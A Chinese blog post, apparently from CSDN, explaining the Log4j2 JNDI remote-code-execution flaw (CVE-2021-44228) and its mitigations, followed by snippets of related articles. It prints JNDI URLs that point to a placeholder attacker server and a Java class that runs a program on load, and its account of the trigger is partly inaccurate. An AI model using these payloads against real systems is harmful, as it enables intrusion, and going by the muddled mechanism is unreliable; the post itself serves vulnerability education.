【Log4j2 CVE-2021-44228】

最新推荐文章于 2024-08-16 11:00:06 发布
最新推荐文章于 2024-08-16 11:00:06 发布
阅读量427 收藏
点赞数
分类专栏: 漏洞复现 文章标签: log4j java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55213436/article/details/129284003
版权

  Log4j是Java编程语言中最常用的日志框架之一。然而,最近发现了一个严重的漏洞,该漏洞被标记为CVE-2021-44228。攻击者可以利用此漏洞执行远程代码,并可能导致目标系统被完全控制。在本篇文章中,我们将探讨Log4j2漏洞的细节和如何利用该漏洞。

漏洞的背景

  漏洞的根本原因是在Log4j2的JNDI查找代码中,存在一个可以远程执行代码的漏洞。JNDI是Java中的一个命名和目录服务,它允许应用程序查找和访问命名和目录服务中的对象。通过使用JNDI来查找日志配置文件,攻击者可以注入一个恶意的JNDI URL,并迫使Log4j2框架执行远程的Java代码。这个漏洞的危害非常严重,因为攻击者可以利用它远程执行任意的Java代码,例如下载恶意软件、修改或删除数据、窃取敏感信息等等。

漏洞的利用

  要利用此漏洞,攻击者需要向目标系统发送一个包含恶意JNDI URL的日志消息。当Log4j2框架尝试加载配置文件时,它会解析这个JNDI URL,并执行其中的代码。攻击者可以在JNDI URL中注入任意的Java代码,例如:

ldap://attacker-server:1389/ExploitObject

攻击者可以在“ExploitObject”对象中嵌入任意的Java代码。例如,以下代码会在目标系统上执行“calc.exe”程序:

rmi://attacker-server:1099/ExploitObject

public class ExploitObject extends UnicastRemoteObject implements Remote {
    public ExploitObject() throws RemoteException {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

此外,攻击者还可以使用其他协议,例如http、https、file等等。以下是一个包含恶意代码的示例URL:

ldap://attacker-server:1389/ExploitObject

要利用此漏洞,攻击者需要找到目标系统中正在运行的Java应用程序,并确定它是否使用了Log4j2框架。如果是,则攻击者可以尝试向该应用程序发送一个包含恶意JNDI URL的日志消息。如果成功,攻击者将获得对目标系统的远程访问权限。

漏洞的解决方案

Log4j2漏洞已被修复,建议使用最新版本的Log4j2框架来修复此漏洞。最新版本的Log4j2框架中已经禁用了JNDI查找功能,以防止攻击者注入恶意JNDI URL。如果您正在使用旧版Log4j2框架,请尽快升级到最新版本,并避免在日志消息中包含任何敏感信息。

此外,还可以采取以下措施来减轻此漏洞的风险:

  1. 防火墙:在网络边界上配置防火墙,限制外部服务器对内部服务器的访问。

  2. 漏洞扫描:使用漏洞扫描工具来检测是否存在Log4j2漏洞。

  3. 日志审计:对所有入站和出站的日志消息进行审计,并及时警报任何可疑的日志消息。

  4. 跟踪应用程序:监控应用程序的行为,包括网络流量、进程行为和系统事件等。

Log4j2漏洞是一个严重的安全问题,需要采取适当的措施来防止攻击。最好的方法是升级到最新版本的Log4j2框架,并实施其他安全措施来降低此漏洞的风险。

网安第一深禽
关注
专栏目录
Apache Log4j2漏洞
Mr.xing的博客
11-13 862
Log4j2是一个Java日志组件,被各类Java框架广泛使用,它的前身是Log4jLog4j2重新构建和设计了框架。本次漏洞影响范围为Log4j2最早期的版本2.0-beta9到2.15.0。Log4j只有一个jar包log4j-${版本号}.jar。Log4j2分为2个jar包,一个是接口log4j-api-${版本号}.jar,一个是具体实现log4j-core-${版本号}.jar。Log4j2的版本号目前均为2.x。Log4j的版本号均为1.x。
Log4j CVE-2021-44228后续-CVE-2021-45046,CVE-2021-45105
oscar999的专栏
12-20 1205
Log4j 发现远程代码攻击漏洞(CVE-2021-44228 )之后, Apache 随即发布了 2.15.0版本, 但是发布的这个版本在线程上下文查找依旧存在远程代码攻击漏洞(CVE-2021-45046),于是随后又发布了 2.16.0版本; 不幸的是,两天后,Log4j 又被发现了DOS(拒绝服务)的漏洞(CVE-2021-45105), 于是又发布了2.17.0 版本, 截止目前位置, Log4jJava 8的**安全版本是2.17.0 **。
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 1040
CVE-2021-44228
log4j2漏洞复现(CVE-2021-44228)
最新发布
人们并不感谢罗辑
08-16 2056
log4j2是一个记录日志的日志记录框架,他存在漏洞的原因是因为反序列化导致的远程代码执行(rce)。在日志记录的过程中使用了JNDI接口,这个接口调用了lookup方法,可以远程加载java对象。如果没有对这个方法进行限制,攻击者可以构造恶意代码,从而使得服务器被getshell
Log4j2漏洞复现(CVE-2021-44228
qq_40860153的博客
05-11 595
3、解析到ldap,就会去192.168.96.1:1099的ldap服务找名为shell的资源,找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会将资源下载下来,然后发现shell是一个.class文件,就会去执行里面的代码,从而实现注入。在log4j框架的基础上进行了改进,并引入了丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。观察dns网站解析日志结果,刷新,发现解析成功,说明漏洞存在。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
CVE-2021-44228-log4j2复现详细版本-简单教程。
weixin_42109829的博客
12-14 5380
0x01-前言 昨晚爆出的log4j rce 是通过lookup触发的漏洞,但jdk1.8.191以上默认不支持ldap协议,对于高版本jdk,则需要一定的依赖。不过为了给大家最简单的说明,我这里还是用jdk1.8.144的版本来运行。 0x02-靶场搭建 docker 搭建方式 docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker run -it -d -p 8080:8080 --name log4j_vuln_
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 788
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6114
log4j 漏洞CVE-2021-44228 漏洞复现
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
2. `apache-log4j-2.12.4-bin.tar.gz`:这是适用于 Java 7 环境的 2.12.4 版本二进制包,包含了针对 CVE-2021-44228 的补丁。 3. `apache-log4j-2.3.2-bin.tar.gz`:这是适用于 Java 6 的 2.3.2 版本二进制包,同样...
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 2499
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Log4j2中2.16.0版漏洞(CVE-2021-45105)原理、复现步骤和修复方法(2.17.0修复原理)
跳小闹成长记
12-22 5910
好不容易2.16.0发布之后,Log4j2官方,又突然发布了2.17.0版本,原因想必大家通过各种号推送都已经知道了。因为在2.16.0版本上发现了一个新的漏洞,该漏洞可能会导致DoS(Denial of Service)攻击。那这个漏洞到底是怎么回事呢?它会有哪些影响呢?今天咱们就一起来深度学习下该漏洞相关原理和攻击步骤。
核弹级漏洞,我把log4j底裤都给扒了
MachineGunJoe666
12-12 1118
大家好,我是周杰伦。 相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂**:这个注定会载入网络安全史册上的漏洞,到底是怎么一回事!** log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,
Log4j2版本2.5之前的漏洞复现
jiangyafu0的博客
12-13 1544
log4j漏洞的测试
log4j2 远程代码执行漏洞复现(CVE-2021-44228
Welcome To Myon'Blog !
03-08 1万+
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
Apache log4j2漏洞
m0_63645854的博客
06-13 619
本文介绍了log4j2的远程代码执行漏洞
apache log4j CVE-2021-44228漏洞怎么解决
06-03
java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值